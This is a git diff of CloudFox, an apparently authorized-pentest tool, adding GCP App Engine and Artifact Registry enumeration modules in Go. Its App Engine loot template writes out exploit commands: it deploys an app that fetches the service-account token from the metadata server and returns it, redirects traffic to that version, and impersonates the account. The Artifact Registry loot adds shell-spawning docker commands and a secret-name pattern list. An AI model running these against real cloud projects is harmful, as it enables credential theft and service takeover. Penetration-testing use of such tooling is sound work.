List services: +gcloud app services list --project=%s + +# List versions for all services: +gcloud app versions list --project=%s + +# List firewall rules: +gcloud app firewall-rules list --project=%s + +# Describe specific service: +gcloud app services describe default --project=%s + +# View application logs: +gcloud app logs read --project=%s --limit=50 + +# List dispatch rules: +gcloud app describe --project=%s --format=json | jq '.dispatchRules' + +# === EXPLOIT COMMANDS === + +# Deploy a new version (code execution as App Engine SA: %s): +# Create a minimal app.yaml: +cat > /tmp/app.yaml << 'APPEOF' +runtime: python39 +instance_class: F1 +handlers: +- url: /.* + script: auto +APPEOF +cat > /tmp/main.py << 'MAINEOF' +import requests, json +from flask import Flask +app = Flask(__name__) +@app.route('/') +def index(): + r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'}) + return json.dumps(r.json()) +MAINEOF +gcloud app deploy /tmp/app.yaml --project=%s --quiet --no-promote + +# Deploy to a specific service: +gcloud app deploy /tmp/app.yaml --project=%s --service=cloudfox-test --quiet --no-promote + +# Set traffic to new malicious version: +gcloud app services set-traffic default --splits=VERSION_ID=1 --project=%s + +# SSH to App Engine Flex instance (only for flex environment): +gcloud app instances ssh INSTANCE_ID --service=SERVICE --version=VERSION --project=%s + +# Access default URL: +curl https://%s + +# Impersonate App Engine default service account: +gcloud auth print-access-token --impersonate-service-account=%s + +`, + projectID, projectID, projectID, projectID, projectID, projectID, projectID, + serviceAccount, + projectID, projectID, projectID, projectID, + defaultHostname, serviceAccount, + ) +} + +func (m *AppEngineModule) analyzeEnvVars(envVars map[string]string, serviceID, versionID, projectID string) int { + secretPatterns := []string{ + "PASSWORD", 
"SECRET", "API_KEY", "TOKEN", "PRIVATE_KEY", + "DATABASE_URL", "DB_PASSWORD", "MYSQL_PASSWORD", "POSTGRES_PASSWORD", + "MONGODB_URI", "AWS_SECRET", "ENCRYPTION_KEY", "JWT_SECRET", "SESSION_SECRET", + } + + secretCount := 0 + + for name := range envVars { + nameUpper := strings.ToUpper(name) + for _, pattern := range secretPatterns { + if strings.Contains(nameUpper, pattern) { + secretCount++ + m.mu.Lock() + m.secretsFound++ + + if lootFile := m.LootMap[projectID]["appengine-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Potential secret in env var: %s (service: %s, version: %s)\n"+ + "# Recommendation: Migrate to Secret Manager\n"+ + "gcloud app versions describe %s --service=%s --project=%s\n\n", + name, serviceID, versionID, + versionID, serviceID, projectID, + ) + } + m.mu.Unlock() + break + } + } + } + + return secretCount +} + +func (m *AppEngineModule) isDeprecatedRuntime(runtime string) bool { + deprecatedRuntimes := []string{ + "python27", "go111", "go112", "go113", "java8", "java11", + "nodejs10", "nodejs12", "php55", "php72", "ruby25", + } + + for _, deprecated := range deprecatedRuntimes { + if runtime == deprecated { + return true + } + } + return false +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *AppEngineModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getAllVersions returns all versions from all projects +func (m *AppEngineModule) getAllVersions() []AppEngineVersion { + var all []AppEngineVersion + for _, versions := range m.ProjectVersions { + all = append(all, versions...) 
+ } + return all +} + +// getAllApps returns all apps from all projects +func (m *AppEngineModule) getAllApps() []AppEngineApp { + var all []AppEngineApp + for _, apps := range m.ProjectApps { + all = append(all, apps...) + } + return all +} + +// getAllFirewallRules returns all firewall rules from all projects +func (m *AppEngineModule) getAllFirewallRules() []AppEngineFirewallRule { + var all []AppEngineFirewallRule + for _, rules := range m.ProjectFirewallRules { + all = append(all, rules...) + } + return all +} + +// getTableHeader returns the main appengine table header +func (m *AppEngineModule) getTableHeader() []string { + return []string{ + "Project ID", + "Project Name", + "App ID", + "Location", + "Status", + "Hostname", + "Service", + "Version", + "Runtime", + "Environment", + "Ingress", + "Public", + "Service Account", + "SA Attack Paths", + "Default SA", + "Deprecated", + "Env Vars", + "Secrets", + "VPC Connector", + "URL", + } +} + +// buildTablesForProject builds tables for given project data +func (m *AppEngineModule) buildTablesForProject(projectID string, apps []AppEngineApp, versions []AppEngineVersion, firewallRules []AppEngineFirewallRule) []internal.TableFile { + var tables []internal.TableFile + header := m.getTableHeader() + var body [][]string + + if len(versions) > 0 { + for _, ver := range versions { + var app AppEngineApp + for _, a := range apps { + if a.ProjectID == ver.ProjectID { + app = a + break + } + } + + publicStr := "No" + if ver.Public { + publicStr = "Yes" + } + + defaultSAStr := "No" + if ver.DefaultSA { + defaultSAStr = "Yes" + } + + deprecatedStr := "No" + if ver.DeprecatedRuntime { + deprecatedStr = "Yes" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if ver.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, ver.ServiceAccount) + } else { + 
attackPaths = "No" + } + } + + body = append(body, []string{ + ver.ProjectID, + m.GetProjectName(ver.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + ver.ServiceID, + ver.ID, + ver.Runtime, + ver.Environment, + ver.IngressSettings, + publicStr, + ver.ServiceAccount, + attackPaths, + defaultSAStr, + deprecatedStr, + fmt.Sprintf("%d", ver.EnvVarCount), + fmt.Sprintf("%d", ver.SecretEnvVars), + ver.VPCConnector, + ver.URL, + }) + + // Add public services to loot + if ver.Public && m.LootMap[projectID] != nil { + if lootFile := m.LootMap[projectID]["appengine-commands"]; lootFile != nil { + lootFile.Contents += fmt.Sprintf( + "# Public App Engine service: %s/%s\n"+ + "curl %s\n\n", + ver.ServiceID, ver.ID, ver.URL, + ) + } + } + } + } else { + for _, app := range apps { + body = append(body, []string{ + app.ProjectID, + m.GetProjectName(app.ProjectID), + app.ID, + app.LocationID, + app.ServingStatus, + app.DefaultHostname, + "No services deployed", // Service + "-", // Version + "-", // Runtime + "-", // Environment + "-", // Ingress + "-", // Public + app.ServiceAccount, // Service Account + "-", // SA Attack Paths + "-", // Default SA + "-", // Deprecated + "-", // Env Vars + "-", // Secrets + "-", // VPC Connector + "-", // URL + }) + } + } + + tables = append(tables, internal.TableFile{ + Name: "appengine", + Header: header, + Body: body, + }) + + // Firewall rules table + if len(firewallRules) > 0 { + var fwBody [][]string + for _, rule := range firewallRules { + fwBody = append(fwBody, []string{ + rule.ProjectID, + m.GetProjectName(rule.ProjectID), + fmt.Sprintf("%d", rule.Priority), + rule.Action, + rule.SourceRange, + rule.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "appengine-firewall", + Header: []string{ + "Project ID", + "Project Name", + "Priority", + "Action", + "Source Range", + "Description", + }, + Body: fwBody, + }) + } + + return tables +} + +// writeHierarchicalOutput writes 
output to per-project directories +func (m *AppEngineModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectApps { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + apps := m.ProjectApps[projectID] + versions := m.ProjectVersions[projectID] + firewallRules := m.ProjectFirewallRules[projectID] + + tables := m.buildTablesForProject(projectID, apps, versions, firewallRules) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = AppEngineOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *AppEngineModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allApps := m.getAllApps() + allVersions := m.getAllVersions() + allFirewallRules := m.getAllFirewallRules() + + // Use empty projectID since we're building for all projects + tables := m.buildTablesForProject("", allApps, allVersions, allFirewallRules) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, 
projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := AppEngineOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_APPENGINE_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/artifact-registry.go b/gcp/commands/artifact-registry.go index 3214fc43..844b19d4 100644 --- a/gcp/commands/artifact-registry.go +++ b/gcp/commands/artifact-registry.go @@ -1,10 +1,14 @@ package commands import ( + "context" "fmt" + "strings" + "sync" artifactregistry "cloud.google.com/go/artifactregistry/apiv1" ArtifactRegistryService "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" "github.com/spf13/cobra" @@ -12,161 +16,573 @@ import ( var GCPArtifactRegistryCommand = &cobra.Command{ Use: globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, - Aliases: []string{}, - Short: "Display GCP artifact registry information", - Args: cobra.MinimumNArgs(0), - Long: ` -Display available artifact registry resource information: -cloudfox gcp artfact-registry`, + Aliases: []string{"ar", "artifacts", "gcr"}, + Short: "Enumerate GCP Artifact Registry and Container Registry with security configuration", + Long: `Enumerate GCP Artifact Registry and legacy Container Registry (gcr.io) with security-relevant details. 
+ +Features: +- Lists all Artifact Registry repositories with security configuration +- Shows Docker images and package artifacts with tags and digests +- Enumerates IAM policies per repository and identifies public repositories +- Shows encryption type (Google-managed vs CMEK) +- Shows repository mode (standard, virtual, remote) +- Generates gcloud commands for artifact enumeration +- Generates exploitation commands for artifact access +- Enumerates legacy Container Registry (gcr.io) locations + +Security Columns: +- Public: Whether the repository has allUsers or allAuthenticatedUsers access +- Encryption: "Google-managed" or "CMEK" (customer-managed keys) +- Mode: STANDARD_REPOSITORY, VIRTUAL_REPOSITORY, or REMOTE_REPOSITORY +- RegistryType: "artifact-registry" or "container-registry" (legacy gcr.io)`, Run: runGCPArtifactRegistryCommand, } -// Code needed to output fields from buckets results using generic HandleOutput function +// ------------------------------ +// Module Struct with embedded BaseGCPModule +// ------------------------------ +type ArtifactRegistryModule struct { + gcpinternal.BaseGCPModule -// Results struct that implements the internal.OutputInterface -type GCPArtifactRegistryResults struct { - ArtifactData []ArtifactRegistryService.ArtifactInfo - RepositoryData []ArtifactRegistryService.RepositoryInfo + // Module-specific fields + ProjectArtifacts map[string][]ArtifactRegistryService.ArtifactInfo // projectID -> artifacts + ProjectRepositories map[string][]ArtifactRegistryService.RepositoryInfo // projectID -> repos + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + client *artifactregistry.Client + mu sync.Mutex } -// Decide what format the name, header and body of the CSV & JSON files will be -func (g GCPArtifactRegistryResults) TableFiles() []internal.TableFile { - var tableFiles []internal.TableFile +// ------------------------------ +// Output Struct implementing CloudfoxOutput interface +// 
------------------------------ +type ArtifactRegistryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} - repoHeader := []string{ - "Name", - "Format", - "Description", - "Size", - "Location", - "ProjectID", - } - - var repoBody [][]string - - for _, value := range g.RepositoryData { - repoBody = append( - repoBody, - []string{ - value.Name, - value.Format, - value.Description, - value.SizeBytes, - value.Location, - value.ProjectID, - }, +func (o ArtifactRegistryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o ArtifactRegistryOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + if err != nil { + return // Error already logged + } + + // Create Artifact Registry client + client, err := artifactregistry.NewClient(cmdCtx.Ctx) + if err != nil { + cmdCtx.Logger.ErrorM(fmt.Sprintf("Failed to create Artifact Registry client: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + defer client.Close() + + // Create module instance + module := &ArtifactRegistryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectArtifacts: make(map[string][]ArtifactRegistryService.ArtifactInfo), + ProjectRepositories: make(map[string][]ArtifactRegistryService.RepositoryInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + client: client, + } + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *ArtifactRegistryModule) Execute(ctx context.Context, logger internal.Logger) { + // Run enumeration with concurrency + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, 
globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, m.processProject) + + allRepos := m.getAllRepositories() + allArtifacts := m.getAllArtifacts() + + // Check results + if len(allRepos) == 0 && len(allArtifacts) == 0 { + logger.InfoM("No artifact registries found", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d repository(ies) with %d artifact(s)", len(allRepos), len(allArtifacts)), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// getAllRepositories returns all repositories from all projects +func (m *ArtifactRegistryModule) getAllRepositories() []ArtifactRegistryService.RepositoryInfo { + var all []ArtifactRegistryService.RepositoryInfo + for _, repos := range m.ProjectRepositories { + all = append(all, repos...) + } + return all +} + +// getAllArtifacts returns all artifacts from all projects +func (m *ArtifactRegistryModule) getAllArtifacts() []ArtifactRegistryService.ArtifactInfo { + var all []ArtifactRegistryService.ArtifactInfo + for _, artifacts := range m.ProjectArtifacts { + all = append(all, artifacts...) 
+ } + return all +} + +// ------------------------------ +// Project Processor (called concurrently for each project) +// ------------------------------ +func (m *ArtifactRegistryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating artifact registries in project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + // Create service and fetch data + ars := ArtifactRegistryService.New(m.client) + result, err := ars.RepositoriesAndArtifacts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME, + fmt.Sprintf("Could not enumerate artifact registries in project %s", projectID)) + return + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectRepositories[projectID] = result.Repositories + m.ProjectArtifacts[projectID] = result.Artifacts + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["artifact-registry-commands"] = &internal.LootFile{ + Name: "artifact-registry-commands", + Contents: "# GCP Artifact Registry Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + + // Generate loot for each repository and artifact + for _, repo := range result.Repositories { + m.addRepositoryToLoot(projectID, repo) + } + for _, artifact := range result.Artifacts { + m.addArtifactToLoot(projectID, artifact) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d repository(ies) and %d artifact(s) in project %s", len(result.Repositories), len(result.Artifacts), projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m 
*ArtifactRegistryModule) addRepositoryToLoot(projectID string, repo ArtifactRegistryService.RepositoryInfo) { + lootFile := m.LootMap[projectID]["artifact-registry-commands"] + if lootFile == nil { + return + } + + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } + + // Handle legacy Container Registry differently + if repo.RegistryType == "container-registry" { + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# LEGACY CONTAINER REGISTRY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Note: Consider migrating to Artifact Registry\n"+ + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s\n"+ + "# List images:\n"+ + "gcloud container images list --repository=%s/%s\n"+ + "# Check for public access (via storage bucket):\n"+ + "gsutil iam get gs://artifacts.%s.appspot.com\n\n", + repo.Name, repo.ProjectID, + strings.Split(repo.Name, "/")[0], // gcr.io hostname + strings.Split(repo.Name, "/")[0], repo.ProjectID, + repo.ProjectID, ) + return } - repoTableFile := internal.TableFile{ - Header: repoHeader, - Body: repoBody, - Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Repository header and enumeration commands + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# REPOSITORY: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# Format: %s, Mode: %s, Encryption: %s, Public: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe repository:\n"+ + "gcloud artifacts repositories describe %s --project=%s --location=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud artifacts repositories get-iam-policy %s 
--project=%s --location=%s\n", + repoName, repo.ProjectID, repo.Location, + repo.Format, repo.Mode, repo.EncryptionType, repo.PublicAccess, + repoName, repo.ProjectID, repo.Location, + repoName, repo.ProjectID, repo.Location, + ) + + // Docker-specific commands + if repo.Format == "DOCKER" { + lootFile.Contents += fmt.Sprintf( + "# Configure Docker authentication:\n"+ + "gcloud auth configure-docker %s-docker.pkg.dev\n"+ + "# List images:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s\n"+ + "# List vulnerabilities:\n"+ + "gcloud artifacts docker images list %s-docker.pkg.dev/%s/%s --show-occurrences --occurrence-filter=\"kind=VULNERABILITY\"\n", + repo.Location, + repo.Location, repo.ProjectID, repoName, + repo.Location, repo.ProjectID, repoName, + ) } - tableFiles = append(tableFiles, repoTableFile) + lootFile.Contents += "\n" +} + +func (m *ArtifactRegistryModule) addArtifactToLoot(projectID string, artifact ArtifactRegistryService.ArtifactInfo) { + lootFile := m.LootMap[projectID]["artifact-registry-commands"] + if lootFile == nil { + return + } - artifactHeader := []string{ + // Exploitation commands for Docker images + if artifact.Format == "DOCKER" { + imageBase := fmt.Sprintf("%s-docker.pkg.dev/%s/%s/%s", + artifact.Location, artifact.ProjectID, artifact.Repository, artifact.Name) + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# DOCKER IMAGE: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Repository: %s, Location: %s\n"+ + "# Digest: %s\n", + artifact.Name, + artifact.ProjectID, + artifact.Repository, artifact.Location, + artifact.Digest, + ) + + lootFile.Contents += "\n# === EXPLOIT COMMANDS ===\n\n" + // Generate commands for each tag + if len(artifact.Tags) > 0 { + for _, tag := range artifact.Tags { + lootFile.Contents += fmt.Sprintf( + "# Tag: %s\n"+ + "docker pull %s:%s\n"+ + "docker 
inspect %s:%s\n"+ + "docker run -it --entrypoint /bin/sh %s:%s\n\n", + tag, + imageBase, tag, + imageBase, tag, + imageBase, tag, + ) + } + } else { + // No tags, use digest + lootFile.Contents += fmt.Sprintf( + "# No tags - use digest\n"+ + "docker pull %s@%s\n"+ + "docker inspect %s@%s\n"+ + "docker run -it --entrypoint /bin/sh %s@%s\n\n", + imageBase, artifact.Digest, + imageBase, artifact.Digest, + imageBase, artifact.Digest, + ) + } + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ArtifactRegistryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Count public repos for finding message + publicCount := 0 + for _, repos := range m.ProjectRepositories { + for _, repo := range repos { + if repo.IsPublic { + publicCount++ + } + } + } + if publicCount > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d publicly accessible repository(ies)!", publicCount), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// getRepoHeader returns the header for repository table +func (m *ArtifactRegistryModule) getRepoHeader() []string { + return []string{ + "Project", "Name", "Format", - "Version", "Location", + "Mode", + "Public", + "Encryption", + "IAM Binding Role", + "Principal Type", + "IAM Binding Principal", + } +} + +// getArtifactHeader returns the header for artifact table +func (m *ArtifactRegistryModule) getArtifactHeader() []string { + return []string{ + "Project", + "Name", "Repository", + "Location", + "Tags", + "Digest", "Size", - "Updated", - "ProjectID", - } - - var artifactBody [][]string - - for _, value := range g.ArtifactData { - artifactBody = append( - artifactBody, - []string{ - value.Name, - value.Format, - value.Version, - value.Location, - value.Repository, - value.SizeBytes, - value.Updated, - value.ProjectID, - }, - ) + "Uploaded", } +} 
+ +// reposToTableBody converts repositories to table body rows +func (m *ArtifactRegistryModule) reposToTableBody(repos []ArtifactRegistryService.RepositoryInfo) [][]string { + var body [][]string + for _, repo := range repos { + // Extract repo name from full path + repoName := repo.Name + parts := strings.Split(repo.Name, "/") + if len(parts) > 0 { + repoName = parts[len(parts)-1] + } - artifactTableFile := internal.TableFile{ - Header: artifactHeader, - Body: artifactBody, - Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + // Format public access display + publicDisplay := "" + if repo.IsPublic { + publicDisplay = repo.PublicAccess + } + + // Shorten mode for display + mode := repo.Mode + mode = strings.TrimPrefix(mode, "REPOSITORY_MODE_") + mode = strings.TrimSuffix(mode, "_REPOSITORY") + + // One row per IAM member + if len(repo.IAMBindings) > 0 { + for _, binding := range repo.IAMBindings { + for _, member := range binding.Members { + memberType := ArtifactRegistryService.GetMemberType(member) + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + binding.Role, + memberType, + member, + }) + } + } + } else { + // Repository with no IAM bindings + body = append(body, []string{ + m.GetProjectName(repo.ProjectID), + repoName, + repo.Format, + repo.Location, + mode, + publicDisplay, + repo.EncryptionType, + "-", + "-", + "-", + }) + } } + return body +} - tableFiles = append(tableFiles, artifactTableFile) +// artifactsToTableBody converts artifacts to table body rows +func (m *ArtifactRegistryModule) artifactsToTableBody(artifacts []ArtifactRegistryService.ArtifactInfo) [][]string { + var body [][]string + for _, artifact := range artifacts { + // Format tags + tags := "-" + if len(artifact.Tags) > 0 { + if len(artifact.Tags) <= 3 { + tags = strings.Join(artifact.Tags, ", ") + } else { + tags = fmt.Sprintf("%s (+%d more)", 
strings.Join(artifact.Tags[:3], ", "), len(artifact.Tags)-3) + } + } - return tableFiles + body = append(body, []string{ + m.GetProjectName(artifact.ProjectID), + artifact.Name, + artifact.Repository, + artifact.Location, + tags, + artifact.Digest, + artifact.SizeBytes, + artifact.Uploaded, + }) + } + return body } -// Decide what is loot based on resource information -func (g GCPArtifactRegistryResults) LootFiles() []internal.LootFile { - // TODO consider a loot file of the URLs to the all docker image artifacts. Maybe sample commands to pull the images - return []internal.LootFile{} +// buildTablesForProject builds table files for a project +func (m *ArtifactRegistryModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if repos, ok := m.ProjectRepositories[projectID]; ok && len(repos) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getRepoHeader(), + Body: m.reposToTableBody(repos), + }) + } + + if artifacts, ok := m.ProjectArtifacts[projectID]; ok && len(artifacts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: fmt.Sprintf("%s-artifacts", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getArtifactHeader(), + Body: m.artifactsToTableBody(artifacts), + }) + } + + return tableFiles } -// Houses high-level logic that retrieves resources and writes to output -func runGCPArtifactRegistryCommand(cmd *cobra.Command, args []string) { - // Retrieve projectIDs from parent (gcp command) ctx - var projectIDs []string - var account string - parentCmd := cmd.Parent() - ctx := cmd.Context() - logger := internal.NewLogger() - if value, ok := ctx.Value("projectIDs").([]string); ok && len(value) > 0 { - projectIDs = value - } else { - logger.ErrorM("Could not retrieve projectIDs from flag value or value is empty", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) +// writeHierarchicalOutput writes 
output to per-project directories +func (m *ArtifactRegistryModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), } - if value, ok := ctx.Value("account").(string); ok { - account = value - } else { - logger.ErrorM("Could not retrieve account email from command", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + for projectID := range m.ProjectRepositories { + tableFiles := m.buildTablesForProject(projectID) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ArtifactRegistryOutput{Table: tableFiles, Loot: lootFiles} + } + + // Also add projects that only have artifacts + for projectID := range m.ProjectArtifacts { + if _, exists := outputData.ProjectLevelData[projectID]; !exists { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = ArtifactRegistryOutput{Table: tableFiles, Loot: lootFiles} + } } - client, err := artifactregistry.NewClient(ctx) + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) if err != nil { - 
logger.ErrorM(fmt.Sprintf("failed to create secret manager client: %v", err), globals.GCP_SECRETS_MODULE_NAME) - return + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) + m.CommandCounter.Error++ } - defer client.Close() +} - // Get the artifact repositories and artifacts using the projectIDs and ArtifactRegistryService - ars := ArtifactRegistryService.New(client) - var artifactResults []ArtifactRegistryService.ArtifactInfo - var repoRestuls []ArtifactRegistryService.RepositoryInfo - - // Set output params leveraging parent (gcp) pflag values - verbosity, _ := parentCmd.PersistentFlags().GetInt("verbosity") - wrap, _ := parentCmd.PersistentFlags().GetBool("wrap") - outputDirectory, _ := parentCmd.PersistentFlags().GetString("outdir") - format, _ := parentCmd.PersistentFlags().GetString("output") - for _, projectID := range projectIDs { - logger.InfoM(fmt.Sprintf("Retrieving all artifact repositories and supported artifacts in all locations from project: %s", projectID), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - result, err := ars.RepositoriesAndArtifacts(projectID) - if err != nil { - logger.ErrorM(err.Error(), globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME) - return - } +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *ArtifactRegistryModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allRepos := m.getAllRepositories() + allArtifacts := m.getAllArtifacts() + + // Build table files + tableFiles := []internal.TableFile{{ + Name: fmt.Sprintf("%s-repos", globals.GCP_ARTIFACT_RESGISTRY_MODULE_NAME), + Header: m.getRepoHeader(), + Body: m.reposToTableBody(allRepos), + }} - artifactResults = append(artifactResults, result.Artifacts...) - repoRestuls = append(repoRestuls, result.Repositories...) 
